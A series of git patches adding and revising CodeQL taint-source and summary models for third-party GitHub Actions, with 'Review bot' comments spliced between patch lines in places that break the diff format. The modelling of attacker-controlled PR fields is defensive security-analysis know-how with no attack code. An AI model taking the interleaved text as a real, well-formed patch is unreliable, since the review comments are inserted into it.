diff --git a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml index 46a577d2f7e2..8358159bd405 100644 --- a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml +++ b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml @@ -3,5 +3,5 @@ extensions: pack: codeql/actions-all extensible: summaryModel data: - - ["mad9000/actions-find-and-replace-string", "*", "source", "value", "taint"] - - ["mad9000/actions-find-and-replace-string", "*", "replace", "value", "taint"] \ No newline at end of file + - ["mad9000/actions-find-and-replace-string", "*", "input.source", "output.value", "taint"] + - ["mad9000/actions-find-and-replace-string", "*", "input.replace", "output.value", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/mattdavis0351_actions.model.yml b/ql/lib/ext/mattdavis0351_actions.model.yml new file mode 100644 index 000000000000..54302b86e837 --- /dev/null +++ b/ql/lib/ext/mattdavis0351_actions.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["mattdavis0351/actions", "*", "input.image-name", "output.imageUrl", "taint"] + - ["mattdavis0351/actions", "*", "input.tag", "output.imageUrl", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml b/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml new file mode 100644 index 000000000000..7904383d7076 --- /dev/null +++ b/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["metro-digital/setup-tools-for-waas", "*", "input.gcp_sa_key", "env.GCLOUD_PROJECT", "taint"] diff --git a/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml b/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml new file mode 100644 index 000000000000..0c283016c86b --- /dev/null 
+++ b/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["mishakav/pytest-coverage-comment", "*", "input.multiple-files", "output.summaryReport", "taint"] diff --git a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml new file mode 100644 index 000000000000..2694ec2c453c --- /dev/null +++ b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "env.EMSDK", "taint"] diff --git a/ql/lib/ext/ruby_setup-ruby.model.yml b/ql/lib/ext/ruby_setup-ruby.model.yml new file mode 100644 index 000000000000..aee6172b5915 --- /dev/null +++ b/ql/lib/ext/ruby_setup-ruby.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["ruby/setup-ruby", "*", "input.ruby-version", "output.ruby-prefix", "taint"] diff --git a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml new file mode 100644 index 000000000000..2167b16c7ba7 --- /dev/null +++ b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["salsify/action-detect-and-tag-new-version", "*", "input.tag-template", "output.tag", "taint"] diff --git a/ql/lib/ext/shallwefootball_upload-s3-action.model.yml b/ql/lib/ext/shallwefootball_upload-s3-action.model.yml new file mode 100644 index 000000000000..d90d7109fc2a --- /dev/null +++ b/ql/lib/ext/shallwefootball_upload-s3-action.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["shallwefootball/upload-s3-action", "*", "input.destination_dir", "output.object_key", "taint"] diff --git a/ql/lib/ext/shogo82148_actions-setup-perl.model.yml b/ql/lib/ext/shogo82148_actions-setup-perl.model.yml new file mode 100644 index 000000000000..20a412fd9b72 --- /dev/null +++ b/ql/lib/ext/shogo82148_actions-setup-perl.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["shogo82148/actions-setup-perl", "*", "input.working-directory", "env.PERL5LIB", "taint"] diff --git a/ql/lib/ext/suisei-cn_actions-download-file.model.yml b/ql/lib/ext/suisei-cn_actions-download-file.model.yml new file mode 100644 index 000000000000..8d0731c97921 --- /dev/null +++ b/ql/lib/ext/suisei-cn_actions-download-file.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["suisei-cn/actions-download-file", "*", "input.filename", "output.filename", "taint"] diff --git a/ql/lib/ext/timheuer_base64-to-file.model.yml b/ql/lib/ext/timheuer_base64-to-file.model.yml new file mode 100644 index 000000000000..9364fd747526 --- /dev/null +++ b/ql/lib/ext/timheuer_base64-to-file.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["timheuer/base64-to-file", "*", "input.fileName", "output.filePath", "taint"] + - ["timheuer/base64-to-file", "*", "input.fileDir", "output.filePath", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/tzkhan_pr-update-action.model.yml b/ql/lib/ext/tzkhan_pr-update-action.model.yml new file mode 100644 index 000000000000..f16b69c7af9d --- /dev/null +++ b/ql/lib/ext/tzkhan_pr-update-action.model.yml 
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: sourceModel
+ data:
+ - ["tzkhan/pr-update-action", "*", "output.headMatch", "pull_request_target", ""]
diff --git a/ql/lib/ext/xt0rted_slash-command-action.model.yml b/ql/lib/ext/xt0rted_slash-command-action.model.yml
new file mode 100644
index 000000000000..59a4c5b56522
--- /dev/null
+++ b/ql/lib/ext/xt0rted_slash-command-action.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: sourceModel
+ data:
+ - ["xt0rted/slash-command-action", "*", "output.command-arguments", "issue_comment", ""]
+ - ["xt0rted/slash-command-action", "*", "output.command-arguments", "pull_request_comment", ""]
From a28f8e90f071c29067eb4fa51a88a25e85dd57b1 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Wed, 21 Feb 2024 16:50:33 +0100
Subject: [PATCH 066/707] Update ql/lib/ext/tj-actions_branch-names.model.yml
---
 ql/lib/ext/tj-actions_branch-names.model.yml | 1 -
 1 file changed, 1 deletion(-)
diff --git a/ql/lib/ext/tj-actions_branch-names.model.yml b/ql/lib/ext/tj-actions_branch-names.model.yml
index 20383f415c28..1618eddf2d8e 100644
--- a/ql/lib/ext/tj-actions_branch-names.model.yml
+++ b/ql/lib/ext/tj-actions_branch-names.model.yml
@@ -4,7 +4,6 @@ extensions:
 extensible: sourceModel
 data:
 # https://github.com/tj-actions/branch-names
- - ["tj-actions/branch-names", "*", "output.base_ref_branch", "pull_request_target", "PR base branch"]
 - ["tj-actions/branch-names", "*", "output.current_branch", "pull_request_target", "PR current branch"]
 - ["tj-actions/branch-names", "*", "output.head_ref_branch", "pull_request_target", "PR head branch"]
 - ["tj-actions/branch-names", "*", "output.ref_branch", "pull_request_target", "Branch tirggering workflow run"]
From 3d5567d6988c4e4197014a2111393f003842b466 Mon Sep 17 00:00:00 2001
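Review bot: The `xt0rted/slash-command-action` model lists `pull_request_comment` as the event for its second `output.command-arguments` row, but GitHub Actions has no event by that name; PR conversation comments are `issue_comment` (the first row) and review comments are `pull_request_review_comment`. If the event column is matched against workflow triggers, the second row is dead and slash commands issued from review comments are not modelled as a source. I would change it to `- ["xt0rted/slash-command-action", "*", "output.command-arguments", "pull_request_review_comment", ""]` once it is confirmed that the action reads `comment.body` from that payload, or drop the row and leave a comment saying only `issue_comment` is supported.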
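Review bot: Removing `output.base_ref_branch` is correct — on `pull_request_target` the base ref is the branch the repository owns, not something the PR author controls — but the surviving `output.ref_branch` row deserves the same scrutiny, since on `pull_request_target` `GITHUB_REF` resolves to the base branch and `ref_branch` is presumably derived from it, which would make it a repository-controlled value rather than an attacker-controlled source. I would either drop that row as well or keep it with a comment above `data:` stating which attacker-influenced value it is believed to carry, so the distinction from `current_branch` and `head_ref_branch` (which come from the PR head and are rightly kept) is explicit. While the file is being touched, the description on the last row has a typo, `tirggering` for `triggering`.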
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Wed, 21 Feb 2024 16:50:44 +0100
Subject: [PATCH 067/707] Update ql/lib/codeql/actions/Ast.qll
Co-authored-by: Jorge <46056498+jorgectf@users.noreply.github.com>
---
 ql/lib/codeql/actions/Ast.qll | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll
index 2e93187b6bf0..8f04005be8f6 100644
--- a/ql/lib/codeql/actions/Ast.qll
+++ b/ql/lib/codeql/actions/Ast.qll
@@ -23,7 +23,7 @@ class AstNode instanceof YamlNode {
 class Statement extends AstNode {
 /** Gets the workflow that this job is a part of. */
 WorkflowStmt getEnclosingWorkflowStmt() {
- exists(WorkflowStmt w | w.getAChildNode*() = this and result = w)
+ this = result.getAChildNode*()
 }
 }
From 9e2be7d67445a3f9ff64ae614ac689b4dabb5b77 Mon Sep 17 00:00:00 2001
From: Jorge <46056498+jorgectf@users.noreply.github.com>
Date: Wed, 21 Feb 2024 17:27:39 +0100
Subject: [PATCH 068/707] Apply suggestions from code review
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Co-authored-by: Alvaro Muñoz
---
 ql/lib/ext/franzdiebold_github-env-vars-action.model.yml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml
index 8475cb66c02d..c08e6f1b3964 100644
--- a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml
+++ b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml
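Review bot: The doc comment kept above the rewritten predicate still says `this job`, but `getEnclosingWorkflowStmt` is declared on `Statement` and so applies to any statement node, and because `getAChildNode*()` is a reflexive closure a `WorkflowStmt` is its own result — behaviour the old `exists(...)` form had too, so the rewrite is equivalent. I would make that explicit: `/** Gets the `WorkflowStmt` enclosing this statement; a workflow statement encloses itself. */`. The `Statement` class closes inside the hunk, so no other members are affected.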
@@ -3,5 +3,5 @@ extensions:
 pack: codeql/actions-all
 extensible: sourceModel
 data:
- - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "pull_request", "PR body"]
- - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_TITLE", "pull_request", "PR title"]
+ - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "pull_request_target", "PR body"]
+ - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_TITLE", "pull_request_target", "PR title"]
From d0b904a5907e7a1369de76723db344bf18381270 Mon Sep 17 00:00:00 2001
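Review bot: Switching both `CI_PR_DESCRIPTION`/`CI_PR_TITLE` rows from `pull_request` to `pull_request_target` is sound if the event column is meant to select privileged triggers, but it leaves only that single event modelled, whereas a PR's title and body are attacker-controlled on every event whose payload carries a `pull_request` object. Please check whether the action also populates these outputs on `pull_request_review` or `pull_request_review_comment` runs and, if it does, add matching rows such as `- ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_TITLE", "pull_request_review", "PR title"]`. If the single event is deliberate, a one-line comment above `data:` stating that only privileged triggers are listed would stop a later reader from re-adding `pull_request`.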
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 21 Feb 2024 21:57:45 +0100 Subject: [PATCH 069/707] Fix QLpack names --- ql/lib/ext/akhileshns_heroku-deploy.model.yml | 2 +- ql/lib/ext/android-actions_setup-android.model.yml | 4 ++-- ql/lib/ext/apple-actions_import-codesign-certs.model.yml | 4 ++-- ql/lib/ext/ashley-taylor_read-json-property-action.model.yml | 4 ++-- ql/lib/ext/ashley-taylor_regex-property-action.model.yml | 4 ++-- ql/lib/ext/aszc_change-string-case-action.model.yml | 2 +- ql/lib/ext/aws-actions_configure-aws-credentials.model.yml | 2 +- ql/lib/ext/bobheadxi_deployments.model.yml | 4 ++-- ql/lib/ext/bufbuild_buf-breaking-action.model.yml | 4 ++-- ql/lib/ext/bufbuild_buf-lint-action.model.yml | 4 ++-- ql/lib/ext/cachix_cachix-action.model.yml | 4 ++-- ql/lib/ext/coursier_cache-action.model.yml | 4 ++-- ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml | 4 ++-- ql/lib/ext/csexton_release-asset-action.model.yml | 2 +- ql/lib/ext/delaguardo_setup-clojure.model.yml | 2 +- ql/lib/ext/franzdiebold_github-env-vars-action.model.yml | 2 +- ql/lib/ext/game-ci_unity-test-runner.model.yml | 2 +- ql/lib/ext/getsentry_action-release.model.yml | 4 ++-- ql/lib/ext/github_codeql-action.model.yml | 2 +- ql/lib/ext/gradle_gradle-build-action.model.yml | 4 ++-- ql/lib/ext/haya14busa_action-cond.model.yml | 4 ++-- ql/lib/ext/hexlet_project-action.model.yml | 2 +- ql/lib/ext/jsdaniell_create-json.model.yml | 4 ++-- ql/lib/ext/jwalton_gh-ecr-push.model.yml | 4 ++-- ql/lib/ext/khan_pull-request-comment-trigger.model.yml | 4 ++-- .../larsoner_circleci-artifacts-redirector-action.model.yml | 2 +- ql/lib/ext/mattdavis0351_actions.model.yml | 4 ++-- ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml | 2 +- ql/lib/ext/mishakav_pytest-coverage-comment.model.yml | 2 +- ql/lib/ext/mymindstorm_setup-emsdk.model.yml | 2 +- ql/lib/ext/ruby_setup-ruby.model.yml | 2 +- .../ext/salsify_action-detect-and-tag-new-version.model.yml | 2 +- 
ql/lib/ext/shallwefootball_upload-s3-action.model.yml | 2 +- ql/lib/ext/shogo82148_actions-setup-perl.model.yml | 2 +- ql/lib/ext/suisei-cn_actions-download-file.model.yml | 2 +- ql/lib/ext/timheuer_base64-to-file.model.yml | 4 ++-- ql/lib/ext/tzkhan_pr-update-action.model.yml | 2 +- ql/lib/ext/xt0rted_slash-command-action.model.yml | 2 +- 38 files changed, 56 insertions(+), 56 deletions(-) diff --git a/ql/lib/ext/akhileshns_heroku-deploy.model.yml b/ql/lib/ext/akhileshns_heroku-deploy.model.yml index 73e49a1fb06c..f370a9fe2228 100644 --- a/ql/lib/ext/akhileshns_heroku-deploy.model.yml +++ b/ql/lib/ext/akhileshns_heroku-deploy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["akhileshns/heroku-deploy", "*", "input.branch", "output.status", "taint"] diff --git a/ql/lib/ext/android-actions_setup-android.model.yml b/ql/lib/ext/android-actions_setup-android.model.yml index 11ea0ae79228..5ecd36f0926f 100644 --- a/ql/lib/ext/android-actions_setup-android.model.yml +++ b/ql/lib/ext/android-actions_setup-android.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["android-actions/setup-android", "*", "input.cmdline-tools-version", "output.ANDROID_COMMANDLINE_TOOLS_VERSION", "taint"] \ No newline at end of file + - ["android-actions/setup-android", "*", "input.cmdline-tools-version", "output.ANDROID_COMMANDLINE_TOOLS_VERSION", "taint"] diff --git a/ql/lib/ext/apple-actions_import-codesign-certs.model.yml b/ql/lib/ext/apple-actions_import-codesign-certs.model.yml index 2fdf6c78d53f..b81f5c17ca22 100644 --- a/ql/lib/ext/apple-actions_import-codesign-certs.model.yml +++ b/ql/lib/ext/apple-actions_import-codesign-certs.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["apple-actions/import-codesign-certs", "*", "input.keychain-password", "output.keychain-password", "taint"] \ No newline at end of file + - ["apple-actions/import-codesign-certs", "*", "input.keychain-password", "output.keychain-password", "taint"] diff --git a/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml b/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml index fb837050879e..5ab9fee16679 100644 --- a/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml +++ b/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["ashley-taylor/read-json-property-action", "*", "input.json", "output.value", "taint"] \ No newline at end of file + - ["ashley-taylor/read-json-property-action", "*", "input.json", "output.value", "taint"] diff --git a/ql/lib/ext/ashley-taylor_regex-property-action.model.yml b/ql/lib/ext/ashley-taylor_regex-property-action.model.yml index d3b929956d1b..a6e1364d218c 100644 --- a/ql/lib/ext/ashley-taylor_regex-property-action.model.yml +++ b/ql/lib/ext/ashley-taylor_regex-property-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["ashley-taylor/regex-property-action", "*", "input.replacement", "output.value", "taint"] - - ["ashley-taylor/regex-property-action", "*", "input.value", "output.value", "taint"] \ No newline at end of file + - ["ashley-taylor/regex-property-action", "*", "input.value", "output.value", "taint"] diff --git a/ql/lib/ext/aszc_change-string-case-action.model.yml b/ql/lib/ext/aszc_change-string-case-action.model.yml index f4527cf1b7f2..cfdbb0b825fb 100644 --- a/ql/lib/ext/aszc_change-string-case-action.model.yml 
+++ b/ql/lib/ext/aszc_change-string-case-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["aszc/change-string-case-action", "*", "input.string", "output.capitalized", "taint"] diff --git a/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml b/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml index f95100942954..26b3a1fd3df6 100644 --- a/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml +++ b/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "env.AWS_ACCESS_KEY_ID", "taint"] diff --git a/ql/lib/ext/bobheadxi_deployments.model.yml b/ql/lib/ext/bobheadxi_deployments.model.yml index a458e229e04d..2d8932d87fb5 100644 --- a/ql/lib/ext/bobheadxi_deployments.model.yml +++ b/ql/lib/ext/bobheadxi_deployments.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["bobheadxi/deployments", "*", "input.env", "output.env", "taint"] \ No newline at end of file + - ["bobheadxi/deployments", "*", "input.env", "output.env", "taint"] diff --git a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml index a6cfbb6ee9e3..ee8e6abef097 100644 --- a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["bufbuild/buf-breaking-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint"] \ No newline at end of file + - ["bufbuild/buf-breaking-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint"] 
diff --git a/ql/lib/ext/bufbuild_buf-lint-action.model.yml b/ql/lib/ext/bufbuild_buf-lint-action.model.yml index 9fb754ea9e14..c58b5a1e1d2e 100644 --- a/ql/lib/ext/bufbuild_buf-lint-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-lint-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["bufbuild/buf-lint-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint"] \ No newline at end of file + - ["bufbuild/buf-lint-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint"] diff --git a/ql/lib/ext/cachix_cachix-action.model.yml b/ql/lib/ext/cachix_cachix-action.model.yml index bd9563317fb5..1c6584eb9d5d 100644 --- a/ql/lib/ext/cachix_cachix-action.model.yml +++ b/ql/lib/ext/cachix_cachix-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["cachix/cachix-action", "*", "input.signingKey", "env.CACHIX_SIGNING_KEY", "taint"] \ No newline at end of file + - ["cachix/cachix-action", "*", "input.signingKey", "env.CACHIX_SIGNING_KEY", "taint"] diff --git a/ql/lib/ext/coursier_cache-action.model.yml b/ql/lib/ext/coursier_cache-action.model.yml index 951a297207de..bfb45dddb668 100644 --- a/ql/lib/ext/coursier_cache-action.model.yml +++ b/ql/lib/ext/coursier_cache-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["coursier/cache-action", "*", "input.path", "env.COURSIER_CACHE", "taint"] \ No newline at end of file + - ["coursier/cache-action", "*", "input.path", "env.COURSIER_CACHE", "taint"] diff --git a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml index ab6458028a51..d4e35196c6c1 100644 --- a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml +++ b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint"] \ No newline at end of file + - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint"] diff --git a/ql/lib/ext/csexton_release-asset-action.model.yml b/ql/lib/ext/csexton_release-asset-action.model.yml index 084e3328dc84..60e35e66a4de 100644 --- a/ql/lib/ext/csexton_release-asset-action.model.yml +++ b/ql/lib/ext/csexton_release-asset-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["csexton/release-asset-action", "*", "input.release-url", "output.url", "taint"] diff --git a/ql/lib/ext/delaguardo_setup-clojure.model.yml b/ql/lib/ext/delaguardo_setup-clojure.model.yml index b2872259fe96..2aa6013c872a 100644 --- a/ql/lib/ext/delaguardo_setup-clojure.model.yml +++ b/ql/lib/ext/delaguardo_setup-clojure.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint"] diff --git a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml index c08e6f1b3964..ffde7dc6a918 100644 --- a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml +++ b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: sourceModel data: - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "pull_request_target", "PR body"] diff --git a/ql/lib/ext/game-ci_unity-test-runner.model.yml b/ql/lib/ext/game-ci_unity-test-runner.model.yml index a0d4b357b5a5..ab413b6e9759 100644 
--- a/ql/lib/ext/game-ci_unity-test-runner.model.yml +++ b/ql/lib/ext/game-ci_unity-test-runner.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint"] diff --git a/ql/lib/ext/getsentry_action-release.model.yml b/ql/lib/ext/getsentry_action-release.model.yml index d416a71c91d6..e6688f3805d0 100644 --- a/ql/lib/ext/getsentry_action-release.model.yml +++ b/ql/lib/ext/getsentry_action-release.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["getsentry/action-release", "*", "input.version", "output.version", "taint"] - - ["getsentry/action-release", "*", "input.version_prefix", "output.version", "taint"] \ No newline at end of file + - ["getsentry/action-release", "*", "input.version_prefix", "output.version", "taint"] diff --git a/ql/lib/ext/github_codeql-action.model.yml b/ql/lib/ext/github_codeql-action.model.yml index 3710f7e07b8a..b214178350c9 100644 --- a/ql/lib/ext/github_codeql-action.model.yml +++ b/ql/lib/ext/github_codeql-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["github/codeql-action", "*", "input.output", "output.sarif-output", "taint"] diff --git a/ql/lib/ext/gradle_gradle-build-action.model.yml b/ql/lib/ext/gradle_gradle-build-action.model.yml index 6ea8a6c68009..0534d299627b 100644 --- a/ql/lib/ext/gradle_gradle-build-action.model.yml +++ b/ql/lib/ext/gradle_gradle-build-action.model.yml 
@@ -1,8 +1,8 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["gradle/gradle-build-action", "*", "input.cache-encryption-key", "env.GRADLE_ENCRYPTION_KEY", "taint"] - ["gradle/gradle-build-action", "*", "input.build-scan-terms-of-service-agree", "env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE", "taint"] - - ["gradle/gradle-build-action", "*", "input.build-scan-terms-of-service-url", "env.BUILD_SCAN_TERMS_OF_SERVICE_URL", "taint"] \ No newline at end of file + - ["gradle/gradle-build-action", "*", "input.build-scan-terms-of-service-url", "env.BUILD_SCAN_TERMS_OF_SERVICE_URL", "taint"] diff --git a/ql/lib/ext/haya14busa_action-cond.model.yml b/ql/lib/ext/haya14busa_action-cond.model.yml index f0e0752b7357..a8a528b85c5a 100644 --- a/ql/lib/ext/haya14busa_action-cond.model.yml +++ b/ql/lib/ext/haya14busa_action-cond.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["haya14busa/action-cond", "*", "input.if_true", "output.value", "taint"] - - ["haya14busa/action-cond", "*", "input.if_false", "output.value", "taint"] \ No newline at end of file + - ["haya14busa/action-cond", "*", "input.if_false", "output.value", "taint"] diff --git a/ql/lib/ext/hexlet_project-action.model.yml b/ql/lib/ext/hexlet_project-action.model.yml index 4499d91cab66..6a907fcc3a19 100644 --- a/ql/lib/ext/hexlet_project-action.model.yml +++ b/ql/lib/ext/hexlet_project-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["hexlet/project-action", "*", "input.mount-path", "env.PWD", "taint"] diff --git a/ql/lib/ext/jsdaniell_create-json.model.yml b/ql/lib/ext/jsdaniell_create-json.model.yml index a0f59b9e38b0..f1a04c9e2441 100644 --- a/ql/lib/ext/jsdaniell_create-json.model.yml +++ b/ql/lib/ext/jsdaniell_create-json.model.yml 
@@ -1,8 +1,8 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["jsdaniell/create-json", "*", "input.name", "output.successfully", "taint"] - ["jsdaniell/create-json", "*", "input.json", "output.successfully", "taint"] - - ["jsdaniell/create-json", "*", "input.dir", "output.successfully", "taint"] \ No newline at end of file + - ["jsdaniell/create-json", "*", "input.dir", "output.successfully", "taint"] diff --git a/ql/lib/ext/jwalton_gh-ecr-push.model.yml b/ql/lib/ext/jwalton_gh-ecr-push.model.yml index 8ae3bb0035d0..b237ac313d2a 100644 --- a/ql/lib/ext/jwalton_gh-ecr-push.model.yml +++ b/ql/lib/ext/jwalton_gh-ecr-push.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["jwalton/gh-ecr-push", "*", "input.image", "output.imageUrl", "taint"] \ No newline at end of file + - ["jwalton/gh-ecr-push", "*", "input.image", "output.imageUrl", "taint"] diff --git a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml index d95c69bc5b18..b872bbe2ed04 100644 --- a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml +++ b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: sourceModel data: - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "issue_comment", ""] - - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "pull_request_comment", ""] \ No newline at end of file + - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "pull_request_comment", ""] diff --git a/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml b/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml index 3c60de5bb0a4..abfca93b4ec9 100644 
